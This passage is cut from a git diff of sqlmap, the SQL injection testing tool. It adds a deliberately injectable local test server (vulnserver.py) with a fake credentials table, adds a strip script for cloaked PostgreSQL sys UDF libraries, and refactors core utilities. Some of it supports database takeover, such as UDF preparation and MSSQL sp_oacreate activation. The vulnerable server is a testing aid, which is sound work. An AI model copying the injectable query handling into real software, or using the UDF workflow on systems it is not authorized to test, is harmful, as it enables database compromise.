case '%s' (#%d)" % (title, test_count) - - if parse: - content += " at parsing: %s:\n\n" % parse - content += "### Log file:\n\n" - content += "%s\n\n" % log - elif not detected: - content += " - SQL injection not detected\n\n" - else: - content += "\n\n" - - if traceback: - content += "### Traceback:\n\n" - content += "%s\n\n" % str(traceback) - - content += "#######################################################################\n\n" - - if content: - content += "Regression test finished at %s" % time.strftime("%H:%M:%S %d-%m-%Y", time.gmtime()) - SUBJECT += " (%s)" % ", ".join("#%d" % count for count in test_counts) - - msg = prepare_email(content) - - for test_count, attachment in attachments.items(): - attachment = MIMEText(attachment) - attachment.add_header("Content-Disposition", "attachment", filename="test_case_%d_console_output.txt" % test_count) - msg.attach(attachment) - - send_email(msg) - -if __name__ == "__main__": - log_fd = open("/tmp/sqlmapregressiontest.log", "wb") - log_fd.write("Regression test started at %s\n" % TIME) - - try: - main() - except Exception, e: - log_fd.write("An exception has occurred:\n%s" % str(traceback.format_exc())) - - log_fd.write("Regression test finished at %s\n\n" % TIME) - log_fd.close() diff --git a/extra/shutils/strip.sh b/extra/shutils/strip.sh new file mode 100755 index 00000000000..0fa81ef62f9 --- /dev/null +++ b/extra/shutils/strip.sh @@ -0,0 +1,18 @@ +#!/bin/bash + +# References: http://www.thegeekstuff.com/2012/09/strip-command-examples/ +# http://www.muppetlabs.com/~breadbox/software/elfkickers.html +# https://ptspts.blogspot.hr/2013/12/how-to-make-smaller-c-and-c-binaries.html + +# https://github.com/BR903/ELFkickers/tree/master/sstrip +# https://www.ubuntuupdates.org/package/core/cosmic/universe/updates/postgresql-server-dev-10 + +# For example: +# python ../../../../../extra/cloak/cloak.py -d -i lib_postgresqludf_sys.so_ +# ../../../../../extra/shutils/strip.sh lib_postgresqludf_sys.so +# python ../../../../../extra/cloak/cloak.py -i lib_postgresqludf_sys.so +# rm lib_postgresqludf_sys.so + +strip -S --strip-unneeded --remove-section=.note.gnu.gold-version --remove-section=.comment --remove-section=.note --remove-section=.note.gnu.build-id --remove-section=.note.ABI-tag $* +sstrip $* + diff --git a/extra/sqlharvest/__init__.py b/extra/sqlharvest/__init__.py deleted file mode 100644 index 9e1072a9c4f..00000000000 --- a/extra/sqlharvest/__init__.py +++ /dev/null @@ -1,8 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -pass diff --git a/extra/sqlharvest/sqlharvest.py b/extra/sqlharvest/sqlharvest.py deleted file mode 100644 index da974e32a0e..00000000000 --- a/extra/sqlharvest/sqlharvest.py +++ /dev/null @@ -1,141 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import cookielib -import re -import socket -import sys -import urllib -import urllib2 -import ConfigParser - -from operator import itemgetter - -TIMEOUT = 10 -CONFIG_FILE = 'sqlharvest.cfg' -TABLES_FILE = 'tables.txt' -USER_AGENT = 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; AskTB5.3)' -SEARCH_URL = 'http://www.google.com/m?source=mobileproducts&dc=gorganic' -MAX_FILE_SIZE = 2 * 1024 * 1024 # if a result (.sql) file for downloading is more than 2MB in size just skip it -QUERY = 'CREATE TABLE ext:sql' -REGEX_URLS = r';u=([^"]+?)&q=' -REGEX_RESULT = r'(?i)CREATE TABLE\s*(/\*.*\*/)?\s*(IF NOT EXISTS)?\s*(?P[^\(;]+)' - -def main(): - tables = dict() - cookies = cookielib.CookieJar() - cookie_processor = urllib2.HTTPCookieProcessor(cookies) - opener = urllib2.build_opener(cookie_processor) - opener.addheaders = [("User-Agent", USER_AGENT)] - - conn = opener.open(SEARCH_URL) - page = conn.read() # set initial cookie values - - config = ConfigParser.ConfigParser() - config.read(CONFIG_FILE) - - if not config.has_section("options"): - config.add_section("options") - if not config.has_option("options", "index"): - config.set("options", "index", "0") - - i = int(config.get("options", "index")) - - try: - with open(TABLES_FILE, 'r') as f: - for line in f.xreadlines(): - if len(line) > 0 and ',' in line: - temp = line.split(',') - tables[temp[0]] = int(temp[1]) - except: - pass - - socket.setdefaulttimeout(TIMEOUT) - - files, old_files = None, None - try: - while True: - abort = False - old_files = files - files = [] - - try: - conn = opener.open("%s&q=%s&start=%d&sa=N" % (SEARCH_URL, QUERY.replace(' ', '+'), i * 10)) - page = conn.read() - for match in re.finditer(REGEX_URLS, page): - files.append(urllib.unquote(match.group(1))) - if len(files) >= 10: - break - abort = (files == old_files) - - except KeyboardInterrupt: - raise - - except Exception, msg: - print msg - - if abort: - break - - sys.stdout.write("\n---------------\n") - sys.stdout.write("Result page #%d\n" % (i + 1)) - sys.stdout.write("---------------\n") - - for sqlfile in files: - print sqlfile - - try: - req = urllib2.Request(sqlfile) - response = urllib2.urlopen(req) - - if "Content-Length" in response.headers: - if int(response.headers.get("Content-Length")) > MAX_FILE_SIZE: - continue - - page = response.read() - found = False - counter = 0 - - for match in re.finditer(REGEX_RESULT, page): - counter += 1 - table = match.group("result").strip().strip("`\"'").replace('"."', ".").replace("].[", ".").strip('[]') - - if table and not any(_ in table for _ in ('>', '<', '--', ' ')): - found = True - sys.stdout.write('*') - - if table in tables: - tables[table] += 1 - else: - tables[table] = 1 - if found: - sys.stdout.write("\n") - - except KeyboardInterrupt: - raise - - except Exception, msg: - print msg - - else: - i += 1 - - except KeyboardInterrupt: - pass - - finally: - with open(TABLES_FILE, 'w+') as f: - tables = sorted(tables.items(), key=itemgetter(1), reverse=True) - for table, count in tables: - f.write("%s,%d\n" % (table, count)) - - config.set("options", "index", str(i + 1)) - with open(CONFIG_FILE, 'w+') as f: - config.write(f) - -if __name__ == "__main__": - main() diff --git a/extra/vulnserver/__init__.py b/extra/vulnserver/__init__.py new file mode 100644 index 00000000000..bcac841631b --- /dev/null +++ b/extra/vulnserver/__init__.py @@ -0,0 +1,8 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +pass diff --git a/extra/vulnserver/vulnserver.py b/extra/vulnserver/vulnserver.py new file mode 100644 index 00000000000..769108f928d --- /dev/null +++ b/extra/vulnserver/vulnserver.py @@ -0,0 +1,353 @@ +#!/usr/bin/env python + +""" +vulnserver.py - Trivial SQLi vulnerable HTTP server (Note: for testing purposes) + +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from __future__ import print_function + +import base64 +import json +import random +import re +import sqlite3 +import string +import sys +import threading +import traceback + +PY3 = sys.version_info >= (3, 0) +UNICODE_ENCODING = "utf-8" +DEBUG = False + +if PY3: + from http.client import INTERNAL_SERVER_ERROR + from http.client import NOT_FOUND + from http.client import OK + from http.server import BaseHTTPRequestHandler + from http.server import HTTPServer + from socketserver import ThreadingMixIn + from urllib.parse import parse_qs + from urllib.parse import unquote_plus +else: + from BaseHTTPServer import BaseHTTPRequestHandler + from BaseHTTPServer import HTTPServer + from httplib import INTERNAL_SERVER_ERROR + from httplib import NOT_FOUND + from httplib import OK + from SocketServer import ThreadingMixIn + from urlparse import parse_qs + from urllib import unquote_plus + +SCHEMA = """ + CREATE TABLE users ( + id INTEGER, + name TEXT, + surname TEXT, + PRIMARY KEY (id) + ); + INSERT INTO users (id, name, surname) VALUES (1, 'luther', 'blisset'); + INSERT INTO users (id, name, surname) VALUES (2, 'fluffy', 'bunny'); + INSERT INTO users (id, name, surname) VALUES (3, 'wu', 'ming'); + INSERT INTO users (id, name, surname) VALUES (4, NULL, 'nameisnull'); + INSERT INTO users (id, name, surname) VALUES (5, 'mark', 'lewis'); + INSERT INTO users (id, name, surname) VALUES (6, 'ada', 'lovelace'); + INSERT INTO users (id, name, surname) VALUES (7, 'grace', 'hopper'); + INSERT INTO users (id, name, surname) VALUES (8, 'alan', 'turing'); + INSERT INTO users (id, name, surname) VALUES (9, 'margaret','hamilton'); + INSERT INTO users (id, name, surname) VALUES (10, 'donald', 'knuth'); + INSERT INTO users (id, name, surname) VALUES (11, 'tim', 'bernerslee'); + INSERT INTO users (id, name, surname) VALUES (12, 'linus', 'torvalds'); + INSERT INTO users (id, name, surname) VALUES (13, 'ken', 'thompson'); + INSERT INTO users (id, name, surname) VALUES (14, 'dennis', 'ritchie'); + INSERT INTO users (id, name, surname) VALUES (15, 'barbara', 'liskov'); + INSERT INTO users (id, name, surname) VALUES (16, 'edsger', 'dijkstra'); + INSERT INTO users (id, name, surname) VALUES (17, 'john', 'mccarthy'); + INSERT INTO users (id, name, surname) VALUES (18, 'leslie', 'lamport'); + INSERT INTO users (id, name, surname) VALUES (19, 'niklaus', 'wirth'); + INSERT INTO users (id, name, surname) VALUES (20, 'bjarne', 'stroustrup'); + INSERT INTO users (id, name, surname) VALUES (21, 'guido', 'vanrossum'); + INSERT INTO users (id, name, surname) VALUES (22, 'brendan', 'eich'); + INSERT INTO users (id, name, surname) VALUES (23, 'james', 'gosling'); + INSERT INTO users (id, name, surname) VALUES (24, 'andrew', 'tanenbaum'); + INSERT INTO users (id, name, surname) VALUES (25, 'yukihiro','matsumoto'); + INSERT INTO users (id, name, surname) VALUES (26, 'radia', 'perlman'); + INSERT INTO users (id, name, surname) VALUES (27, 'katherine','johnson'); + INSERT INTO users (id, name, surname) VALUES (28, 'hady', 'lamarr'); + INSERT INTO users (id, name, surname) VALUES (29, 'frank', 'miller'); + INSERT INTO users (id, name, surname) VALUES (30, 'john', 'steward'); + + CREATE TABLE creds ( + user_id INTEGER, + password_hash TEXT, + FOREIGN KEY (user_id) REFERENCES users(id) + ); + INSERT INTO creds (user_id, password_hash) VALUES (1, 'db3a16990a0008a3b04707fdef6584a0'); + INSERT INTO creds (user_id, password_hash) VALUES (2, '4db967ce67b15e7fb84c266a76684729'); + INSERT INTO creds (user_id, password_hash) VALUES (3, 'f5a2950eaa10f9e99896800eacbe8275'); + INSERT INTO creds (user_id, password_hash) VALUES (4, NULL); + INSERT INTO creds (user_id, password_hash) VALUES (5, '179ad45c6ce2cb97cf1029e212046e81'); + INSERT INTO creds (user_id, password_hash) VALUES (6, '0f1e2d3c4b5a69788796a5b4c3d2e1f0'); + INSERT INTO creds (user_id, password_hash) VALUES (7, 'a1b2c3d4e5f60718293a4b5c6d7e8f90'); + INSERT INTO creds (user_id, password_hash) VALUES (8, '1a2b3c4d5e6f708192a3b4c5d6e7f809'); + INSERT INTO creds (user_id, password_hash) VALUES (9, '9f8e7d6c5b4a3928170605f4e3d2c1b0'); + INSERT INTO creds (user_id, password_hash) VALUES (10, '3c2d1e0f9a8b7c6d5e4f30291807f6e5'); + INSERT INTO creds (user_id, password_hash) VALUES (11, 'b0c1d2e3f405162738495a6b7c8d9eaf'); + INSERT INTO creds (user_id, password_hash) VALUES (12, '6e5d4c3b2a190807f6e5d4c3b2a1908f'); + INSERT INTO creds (user_id, password_hash) VALUES (13, '11223344556677889900aabbccddeeff'); + INSERT INTO creds (user_id, password_hash) VALUES (14, 'ffeeddccbbaa00998877665544332211'); + INSERT INTO creds (user_id, password_hash) VALUES (15, '1234567890abcdef1234567890abcdef'); + INSERT INTO creds (user_id, password_hash) VALUES (16, 'abcdef1234567890abcdef1234567890'); + INSERT INTO creds (user_id, password_hash) VALUES (17, '0a1b2c3d4e5f60718a9b0c1d2e3f4051'); + INSERT INTO creds (user_id, password_hash) VALUES (18, '51f04e3d2c1b0a9871605f4e3d2c1b0a'); + INSERT INTO creds (user_id, password_hash) VALUES (19, '89abcdef0123456789abcdef01234567'); + INSERT INTO creds (user_id, password_hash) VALUES (20, '76543210fedcba9876543210fedcba98'); + INSERT INTO creds (user_id, password_hash) VALUES (21, '13579bdf2468ace013579bdf2468ace0'); + INSERT INTO creds (user_id, password_hash) VALUES (22, '02468ace13579bdf02468ace13579bdf'); + INSERT INTO creds (user_id, password_hash) VALUES (23, 'deadbeefdeadbeefdeadbeefdeadbeef'); + INSERT INTO creds (user_id, password_hash) VALUES (24, 'cafebabecafebabecafebabecafebabe'); + INSERT INTO creds (user_id, password_hash) VALUES (25, '00112233445566778899aabbccddeeff'); + INSERT INTO creds (user_id, password_hash) VALUES (26, 'f0e1d2c3b4a5968778695a4b3c2d1e0f'); + INSERT INTO creds (user_id, password_hash) VALUES (27, '7f6e5d4c3b2a190807f6e5d4c3b2a190'); + INSERT INTO creds (user_id, password_hash) VALUES (28, '908f7e6d5c4b3a291807f6e5d4c3b2a1'); + INSERT INTO creds (user_id, password_hash) VALUES (29, '3049b791fa83e2f42f37bae18634b92d'); + INSERT INTO creds (user_id, password_hash) VALUES (30, 'd59a348f90d757c7da30418773424b5e'); +""" + +LISTEN_ADDRESS = "localhost" +LISTEN_PORT = 8440 + +_conn = None +_cursor = None +_lock = None +_server = None +_alive = False +_csrf_token = None + +def init(quiet=False): + global _conn + global _cursor + global _lock + global _csrf_token + + _csrf_token = "".join(random.sample(string.ascii_letters + string.digits, 20)) + + _conn = sqlite3.connect(":memory:", isolation_level=None, check_same_thread=False) + _cursor = _conn.cursor() + _lock = threading.Lock() + + _cursor.executescript(SCHEMA) + + if quiet: + global print + + def _(*args, **kwargs): + pass + + print = _ + +class ThreadingServer(ThreadingMixIn, HTTPServer): + def finish_request(self, *args, **kwargs): + try: + HTTPServer.finish_request(self, *args, **kwargs) + except Exception: + if DEBUG: + traceback.print_exc() + +class ReqHandler(BaseHTTPRequestHandler): + def do_REQUEST(self): + path, query = self.path.split('?', 1) if '?' in self.path else (self.path, "") + params = {} + + if query: + params.update(parse_qs(query)) + + if "||%s" % (r"|<[^>]+>|\t|\n|\r" if onlyText else ""), " ", page) - while retVal.find(" ") != -1: - retVal = retVal.replace(" ", " ") - retVal = htmlunescape(retVal) + if isinstance(page, six.text_type): + retVal = re.sub(r"(?si)||%s" % (r"|<[^>]+>|\t|\n|\r" if onlyText else ""), split, page) + retVal = re.sub(r"%s{2,}" % split, split, retVal) + retVal = htmlUnescape(retVal.strip().strip(split)) return retVal def getPageWordSet(page): """ Returns word set used in page content + + >>> sorted(getPageWordSet(u'foobartest')) == [u'foobar', u'test'] + True """ retVal = set() # only if the page's charset has been successfully identified - if isinstance(page, unicode): - _ = getFilteredPageContent(page) - retVal = set(re.findall(r"\w+", _)) + if isinstance(page, six.string_types): + retVal = set(_.group(0) for _ in re.finditer(r"\w+", getFilteredPageContent(page))) return retVal -def showStaticWords(firstPage, secondPage): +def showStaticWords(firstPage, secondPage, minLength=3): + """ + Prints words appearing in two different response pages + + >>> showStaticWords("this is a test", "this is another test") + ['this'] + """ + infoMsg = "finding static words in longest matching part of dynamic page content" logger.info(infoMsg) @@ -1434,12 +2290,11 @@ def showStaticWords(firstPage, secondPage): commonWords = None if commonWords: - commonWords = list(commonWords) - commonWords.sort(lambda a, b: cmp(a.lower(), b.lower())) + commonWords = [_ for _ in commonWords if len(_) >= minLength] + commonWords.sort(key=functools.cmp_to_key(lambda a, b: cmp(a.lower(), b.lower()))) for word in commonWords: - if len(word) > 2: - infoMsg += "'%s', " % word + infoMsg += "'%s', " % word infoMsg = infoMsg.rstrip(", ") else: @@ -1447,34 +2302,41 @@ def showStaticWords(firstPage, secondPage): logger.info(infoMsg) + return commonWords + def isWindowsDriveLetterPath(filepath): """ Returns True if given filepath starts with a Windows drive letter + + >>> isWindowsDriveLetterPath('C:\\boot.ini') + True + >>> isWindowsDriveLetterPath('/var/log/apache.log') + False """ - return re.search("\A[\w]\:", filepath) is not None + return re.search(r"\A[\w]\:", filepath) is not None def posixToNtSlashes(filepath): """ - Replaces all occurances of Posix slashes (/) in provided - filepath with NT ones (/) + Replaces all occurrences of Posix slashes in provided + filepath with NT backslashes >>> posixToNtSlashes('C:/Windows') 'C:\\\\Windows' """ - return filepath.replace('/', '\\') + return filepath.replace('/', '\\') if filepath else filepath def ntToPosixSlashes(filepath): """ - Replaces all occurances of NT slashes (\) in provided - filepath with Posix ones (/) + Replaces all occurrences of NT backslashes in provided + filepath with Posix slashes - >>> ntToPosixSlashes('C:\\Windows') + >>> ntToPosixSlashes(r'C:\\Windows') 'C:/Windows' """ - return filepath.replace('\\', '/') + return filepath.replace('\\', '/') if filepath else filepath def isHexEncodedString(subject): """ @@ -1488,9 +2350,13 @@ def isHexEncodedString(subject): return re.match(r"\A[0-9a-fA-Fx]+\Z", subject) is not None +@cachedmethod def getConsoleWidth(default=80): """ Returns console width + + >>> any((getConsoleWidth(), True)) + True """ width = None @@ -1498,11 +2364,14 @@ def getConsoleWidth(default=80): if os.getenv("COLUMNS", "").isdigit(): width = int(os.getenv("COLUMNS")) else: - output = execute("stty size", shell=True, stdout=PIPE, stderr=PIPE).stdout.read() - items = output.split() + try: + output = shellExec("stty size") + match = re.search(r"\A\d+ (\d+)", output) - if len(items) == 2 and items[1].isdigit(): - width = int(items[1]) + if match: + width = int(match.group(1)) + except (OSError, MemoryError): + pass if width is None: try: @@ -1516,28 +2385,55 @@ def getConsoleWidth(default=80): return width or default +def shellExec(cmd): + """ + Executes arbitrary shell command + + >>> shellExec('echo 1').strip() == '1' + True + """ + + retVal = "" + + try: + retVal = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT).communicate()[0] or "" + except Exception as ex: + retVal = getSafeExString(ex) + finally: + retVal = getText(retVal) + + return retVal + def clearConsoleLine(forceOutput=False): """ Clears current console line """ - if getattr(LOGGER_HANDLER, "is_tty", False): + if IS_TTY: dataToStdout("\r%s\r" % (" " * (getConsoleWidth() - 1)), forceOutput) kb.prependFlag = False - kb.stickyLevel = None def parseXmlFile(xmlFile, handler): """ Parses XML file by a given handler """ - with contextlib.closing(StringIO(readCachedFileContent(xmlFile))) as stream: - parse(stream, handler) + try: + with contextlib.closing(io.StringIO(readCachedFileContent(xmlFile))) as stream: + parse(stream, handler) + except (SAXParseException, UnicodeError) as ex: + errMsg = "something appears to be wrong with " + errMsg += "the file '%s' ('%s'). Please make " % (xmlFile, getSafeExString(ex)) + errMsg += "sure that you haven't made any changes to it" + raise SqlmapInstallationException(errMsg) def getSQLSnippet(dbms, sfile, **variables): """ Returns content of SQL snippet located inside 'procs/' directory + + >>> 'RECONFIGURE' in getSQLSnippet(DBMS.MSSQL, "activate_sp_oacreate") + True """ if sfile.endswith('.sql') and os.path.exists(sfile): @@ -1550,10 +2446,10 @@ def getSQLSnippet(dbms, sfile, **variables): retVal = readCachedFileContent(filename) retVal = re.sub(r"#.+", "", retVal) - retVal = re.sub(r"(?s);\s+", "; ", retVal).strip("\r\n") + retVal = re.sub(r";\s+", "; ", retVal).strip("\r\n") - for _ in variables.keys(): - retVal = re.sub(r"%%%s%%" % _, variables[_], retVal) + for _ in variables: + retVal = re.sub(r"%%%s%%" % _, variables[_].replace('\\', r'\\'), retVal) for _ in re.findall(r"%RANDSTR\d+%", retVal, re.I): retVal = retVal.replace(_, randomStr()) @@ -1561,78 +2457,78 @@ def getSQLSnippet(dbms, sfile, **variables): for _ in re.findall(r"%RANDINT\d+%", retVal, re.I): retVal = retVal.replace(_, randomInt()) - variables = re.findall(r"%(\w+)%", retVal, re.I) + variables = re.findall(r"(? 1 else "", ", ".join(variables), sfile) logger.error(errMsg) msg = "do you want to provide the substitution values? [y/N] " - choice = readInput(msg, default="N") - if choice and choice[0].lower() == "y": + if readInput(msg, default='N', boolean=True): for var in variables: msg = "insert value for variable '%s': " % var - val = readInput(msg) + val = readInput(msg, default="") retVal = retVal.replace(r"%%%s%%" % var, val) return retVal -def readCachedFileContent(filename, mode='rb'): +def readCachedFileContent(filename, mode='r'): """ Cached reading of file content (avoiding multiple same file reading) + + >>> "readCachedFileContent" in readCachedFileContent(__file__) + True """ if filename not in kb.cache.content: with kb.locks.cache: if filename not in kb.cache.content: checkFile(filename) - with codecs.open(filename, mode, UNICODE_ENCODING) as f: - kb.cache.content[filename] = f.read() + try: + with openFile(filename, mode) as f: + kb.cache.content[filename] = f.read() + except (IOError, OSError, MemoryError) as ex: + errMsg = "something went wrong while trying " + errMsg += "to read the content of file '%s' ('%s')" % (filename, getSafeExString(ex)) + raise SqlmapSystemException(errMsg) return kb.cache.content[filename] -def readXmlFile(xmlFile): - """ - Reads XML file content and returns its DOM representation +def average(values): """ + Computes the arithmetic mean of a list of numbers. - checkFile(xmlFile) - retVal = minidom.parse(xmlFile).documentElement + >>> "%.1f" % average([0.9, 0.9, 0.9, 1.0, 0.8, 0.9]) + '0.9' + """ - return retVal + return (1.0 * sum(values) / len(values)) if values else None +@cachedmethod def stdev(values): """ Computes standard deviation of a list of numbers. - Reference: http://www.goldb.org/corestats.html + + # Reference: http://www.goldb.org/corestats.html + + >>> "%.3f" % stdev([0.9, 0.9, 0.9, 1.0, 0.8, 0.9]) + '0.063' """ if not values or len(values) < 2: return None - - key = (values[0], values[-1], len(values)) - - if key in kb.cache.stdev: - retVal = kb.cache.stdev[key] else: avg = average(values) - _ = reduce(lambda x, y: x + pow((y or 0) - avg, 2), values, 0.0) - retVal = sqrt(_ / (len(values) - 1)) - kb.cache.stdev[key] = retVal - - return retVal - -def average(values): - """ - Computes the arithmetic mean of a list of numbers. - """ - - return (sum(values) / len(values)) if values else None + _ = 1.0 * sum(pow((_ or 0) - avg, 2) for _ in values) + return sqrt(_ / (len(values) - 1)) def calculateDeltaSeconds(start): """ Returns elapsed time from start till now + + >>> calculateDeltaSeconds(0) > 1151721660 + True """ return time.time() - start @@ -1640,13 +2536,16 @@ def calculateDeltaSeconds(start): def initCommonOutputs(): """ Initializes dictionary containing common output values used by "good samaritan" feature + + >>> initCommonOutputs(); "information_schema" in kb.commonOutputs["Databases"] + True """ kb.commonOutputs = {} key = None - with codecs.open(paths.COMMON_OUTPUTS, 'r', UNICODE_ENCODING) as f: - for line in f.readlines(): # xreadlines doesn't return unicode strings when codec.open() is used + with openFile(paths.COMMON_OUTPUTS, 'r') as f: + for line in f: if line.find('#') != -1: line = line[:line.find('#')] @@ -1662,42 +2561,47 @@ def initCommonOutputs(): if line not in kb.commonOutputs[key]: kb.commonOutputs[key].add(line) -def getFileItems(filename, commentPrefix='#', unicode_=True, lowercase=False, unique=False): +def getFileItems(filename, commentPrefix='#', unicoded=True, lowercase=False, unique=False): """ Returns newline delimited items contained inside file + + >>> "SELECT" in getFileItems(paths.SQL_KEYWORDS) + True """ retVal = list() if not unique else OrderedDict() - checkFile(filename) + if filename: + filename = filename.strip('"\'') - with codecs.open(filename, 'r', UNICODE_ENCODING) if unicode_ else open(filename, 'r') as f: - for line in (f.readlines() if unicode_ else f.xreadlines()): # xreadlines doesn't return unicode strings when codec.open() is used - if commentPrefix: - if line.find(commentPrefix) != -1: - line = line[:line.find(commentPrefix)] + checkFile(filename) - line = line.strip() + try: + with openFile(filename, 'r', errors="ignore") if unicoded else open(filename, 'r') as f: + for line in f: + if commentPrefix: + if line.find(commentPrefix) != -1: + line = line[:line.find(commentPrefix)] - if not unicode_: - try: - line = str.encode(line) - except UnicodeDecodeError: - continue + line = line.strip() - if line: - if lowercase: - line = line.lower() + if line: + if lowercase: + line = line.lower() - if unique and line in retVal: - continue + if unique and line in retVal: + continue - if unique: - retVal[line] = True - else: - retVal.append(line) + if unique: + retVal[line] = True + else: + retVal.append(line) + except (IOError, OSError, MemoryError) as ex: + errMsg = "something went wrong while trying " + errMsg += "to read the content of file '%s' ('%s')" % (filename, getSafeExString(ex)) + raise SqlmapSystemException(errMsg) - return retVal if not unique else retVal.keys() + return retVal if not unique else list(retVal.keys()) def goGoodSamaritan(prevValue, originalCharset): """ @@ -1756,7 +2660,7 @@ def goGoodSamaritan(prevValue, originalCharset): # Split the original charset into common chars (commonCharset) # and other chars (otherCharset) for ordChar in originalCharset: - if chr(ordChar) not in predictionSet: + if _unichr(ordChar) not in predictionSet: otherCharset.append(ordChar) else: commonCharset.append(ordChar) @@ -1767,10 +2671,10 @@ def goGoodSamaritan(prevValue, originalCharset): else: return None, None, None, originalCharset -def getPartRun(): +def getPartRun(alias=True): """ - Goes through call stack and finds constructs matching conf.dbmsHandler.*. - Returns it or its alias used in txt/common-outputs.txt + Goes through call stack and finds constructs matching + conf.dbmsHandler.*. Returns it or its alias used in 'txt/common-outputs.txt' """ retVal = None @@ -1799,48 +2703,19 @@ def getPartRun(): pass # Return the INI tag to consider for common outputs (e.g. 'Databases') - return commonPartsDict[retVal][1] if isinstance(commonPartsDict.get(retVal), tuple) else retVal - -def getUnicode(value, encoding=None, system=False, noneToNull=False): - """ - Return the unicode representation of the supplied value: - - >>> getUnicode(u'test') - u'test' - >>> getUnicode('test') - u'test' - >>> getUnicode(1) - u'1' - """ - - if noneToNull and value is None: - return NULL - - if isListLike(value): - value = list(getUnicode(_, encoding, system, noneToNull) for _ in value) - return value - - if not system: - if isinstance(value, unicode): - return value - elif isinstance(value, basestring): - while True: - try: - return unicode(value, encoding or kb.get("pageEncoding") or UNICODE_ENCODING) - except UnicodeDecodeError, ex: - value = value[:ex.start] + "".join(INVALID_UNICODE_CHAR_FORMAT % ord(_) for _ in value[ex.start:ex.end]) + value[ex.end:] - else: - return unicode(value) # encoding ignored for non-basestring instances + if alias: + return commonPartsDict[retVal][1] if isinstance(commonPartsDict.get(retVal), tuple) else retVal else: - try: - return getUnicode(value, sys.getfilesystemencoding() or sys.stdin.encoding) - except: - return getUnicode(value, UNICODE_ENCODING) + return retVal def longestCommonPrefix(*sequences): """ Returns longest common prefix occuring in given sequences - Reference: http://boredzo.org/blog/archives/2007-01-06/longest-common-prefix-in-python-2 + + # Reference: http://boredzo.org/blog/archives/2007-01-06/longest-common-prefix-in-python-2 + + >>> longestCommonPrefix('foobar', 'fobar') + 'fo' """ if len(sequences) == 1: @@ -1861,23 +2736,56 @@ def longestCommonPrefix(*sequences): return sequences[0] def commonFinderOnly(initial, sequence): - return longestCommonPrefix(*filter(lambda x: x.startswith(initial), sequence)) + """ + Returns parts of sequence which start with the given initial string + + >>> commonFinderOnly("abcd", ["abcdefg", "foobar", "abcde"]) + 'abcde' + """ + + return longestCommonPrefix(*[_ for _ in sequence if _.startswith(initial)]) def pushValue(value): """ Push value to the stack (thread dependent) """ - getCurrentThreadData().valueStack.append(copy.deepcopy(value)) + exception = None + success = False + + for i in xrange(PUSH_VALUE_EXCEPTION_RETRY_COUNT): + try: + getCurrentThreadData().valueStack.append(copy.deepcopy(value)) + success = True + break + except Exception as ex: + exception = ex + + if not success: + getCurrentThreadData().valueStack.append(None) + + if exception: + raise exception def popValue(): """ Pop value from the stack (thread dependent) + + >>> pushValue('foobar') + >>> popValue() + 'foobar' """ - return getCurrentThreadData().valueStack.pop() + retVal = None + + try: + retVal = getCurrentThreadData().valueStack.pop() + except IndexError: + pass -def wasLastRequestDBMSError(): + return retVal + +def wasLastResponseDBMSError(): """ Returns True if the last web request resulted in a (recognized) DBMS error page """ @@ -1885,15 +2793,15 @@ def wasLastRequestDBMSError(): threadData = getCurrentThreadData() return threadData.lastErrorPage and threadData.lastErrorPage[0] == threadData.lastRequestUID -def wasLastRequestHTTPError(): +def wasLastResponseHTTPError(): """ - Returns True if the last web request resulted in an errornous HTTP code (like 500) + Returns True if the last web request resulted in an erroneous HTTP code (like 500) """ threadData = getCurrentThreadData() return threadData.lastHTTPError and threadData.lastHTTPError[0] == threadData.lastRequestUID -def wasLastRequestDelayed(): +def wasLastResponseDelayed(): """ Returns True if the last web request resulted in a time-delay """ @@ -1902,42 +2810,45 @@ def wasLastRequestDelayed(): # response times should be inside +-7*stdev([normal response times]) # Math reference: http://www.answers.com/topic/standard-deviation - deviation = stdev(kb.responseTimes) + deviation = stdev(kb.responseTimes.get(kb.responseTimeMode, [])) threadData = getCurrentThreadData() - if deviation and not conf.direct: - if len(kb.responseTimes) < MIN_TIME_RESPONSES: + if deviation and not conf.direct and not conf.disableStats: + if len(kb.responseTimes[kb.responseTimeMode]) < MIN_TIME_RESPONSES: warnMsg = "time-based standard deviation method used on a model " warnMsg += "with less than %d response times" % MIN_TIME_RESPONSES - logger.warn(warnMsg) + logger.warning(warnMsg) - lowerStdLimit = average(kb.responseTimes) + TIME_STDEV_COEFF * deviation - retVal = (threadData.lastQueryDuration >= lowerStdLimit) + lowerStdLimit = average(kb.responseTimes[kb.responseTimeMode]) + TIME_STDEV_COEFF * deviation + retVal = (threadData.lastQueryDuration >= max(MIN_VALID_DELAYED_RESPONSE, lowerStdLimit)) if not kb.testMode and retVal: if kb.adjustTimeDelay is None: msg = "do you want sqlmap to try to optimize value(s) " msg += "for DBMS delay responses (option '--time-sec')? [Y/n] " - choice = readInput(msg, default='Y') - kb.adjustTimeDelay = ADJUST_TIME_DELAY.DISABLE if choice.upper() == 'N' else ADJUST_TIME_DELAY.YES + + kb.adjustTimeDelay = ADJUST_TIME_DELAY.DISABLE if not readInput(msg, default='Y', boolean=True) else ADJUST_TIME_DELAY.YES if kb.adjustTimeDelay is ADJUST_TIME_DELAY.YES: adjustTimeDelay(threadData.lastQueryDuration, lowerStdLimit) return retVal else: - return (threadData.lastQueryDuration - conf.timeSec) >= 0 + delta = threadData.lastQueryDuration - conf.timeSec + if Backend.getIdentifiedDbms() in (DBMS.MYSQL,): # MySQL's SLEEP(X) lasts 0.05 seconds shorter on average + delta += 0.05 + return delta >= 0 def adjustTimeDelay(lastQueryDuration, lowerStdLimit): """ Provides tip for adjusting time delay in time-based data retrieval """ - candidate = 1 + int(round(lowerStdLimit)) + candidate = (1 if not isHeavyQueryBased() else 2) + int(round(lowerStdLimit)) - if candidate: - kb.delayCandidates = [candidate] + kb.delayCandidates[:-1] + kb.delayCandidates = [candidate] + kb.delayCandidates[:-1] - if all((x == candidate for x in kb.delayCandidates)) and candidate < conf.timeSec: + if all((_ == candidate for _ in kb.delayCandidates)) and candidate < conf.timeSec: + if lastQueryDuration / 